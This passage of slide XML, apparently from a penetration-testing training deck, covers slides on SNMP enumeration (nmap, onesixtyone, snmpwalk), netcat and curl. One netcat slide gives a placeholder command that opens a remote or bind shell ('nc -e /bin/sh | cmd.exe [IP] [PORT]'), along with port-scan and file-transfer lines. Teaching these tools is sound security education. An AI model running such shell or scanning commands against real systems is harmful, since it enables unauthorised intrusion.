                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -p 161 [IP]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>onesixtyone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -c /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>seclists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/Discovery/SNMP/common-snmp-community-strings.txt [IP]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>snmpwalk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -c [COMMUNITY] -v [1/2c/3]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E5EEEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enumerates all MIB trees by default, see notes for specifics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D8AB957-6826-48B9-9413-82C93348E73F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3432900" y="3657600"/>
            <a:ext cx="5334744" cy="2657846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="426381736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E7711-DEE4-486E-BFDD-8A3668367678}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>252</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{294642DA-1F86-424E-8094-424762CCE8F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> / nc.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85B567B6-7ED7-42B9-98AB-2212C6118700}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371600"/>
            <a:ext cx="11338560" cy="2667000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Read and write over a network connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Send reverse shells, send files, or create bind shells</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nvlp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [PORT]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [address] [port]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -e [/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> | cmd.exe] [IP] [PORT]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24DBEA9F-0AF9-4D0E-9BF5-4FF025E7C259}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4343400"/>
            <a:ext cx="5210902" cy="1571844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E55DABA3-DBB1-487E-97D7-223973BA2E66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6380186" y="4557742"/>
            <a:ext cx="5296639" cy="1143160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5188B52A-3EA5-48EF-96CA-C69F1BA29A88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2466823" y="5408626"/>
            <a:ext cx="3159647" cy="147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4B59F2-36C9-4683-AF65-2DBBE28432F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7284260" y="4613801"/>
            <a:ext cx="1120580" cy="147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10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C57B2-B4A0-4CD3-8235-ACC96DE71FE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>253</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15DEFBA5-CB7F-4784-9F17-6814CF78AD01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>More </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9997D5AC-7DC4-43A2-B691-7BB7D01CCAF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</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nvv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -w [TIMEOUT] -z [IP] [PORT-PORT] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(TCP Port Scan)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</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nv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -u -z -w 1 [IP] [PORT-PORT] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(UDP Port Scan)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</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nvlp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [PORT] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(Listen on port)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Can save file by appending </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nc.file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nc</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nv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> [IP] [PORT] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(Connect to port)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Can transfer file by appending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nc.file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" alt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40705745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9EB92-3CCB-4F45-BD81-0EDA9769DF8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>254</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05583162-5679-4E5C-9C0A-BB060C28723E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>curl</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA390FDB-22B2-4833-9BDA-06467740A1D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371600"/>
            <a:ext cx="5364480" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interact with web servers and transfer files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>curl options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--output [FILE] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(Save to file)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-x POST -d  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(Post data)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-H </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(Set headers)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>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silent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (suppress output)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7486B310-0A81-4436-B690-2B6B5D5CABDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248400" y="862171"/>
            <a:ext cx="5020376" cy="2353003"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A441046A-9DFF-48CE-B4B8-BC0DBB0E726A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
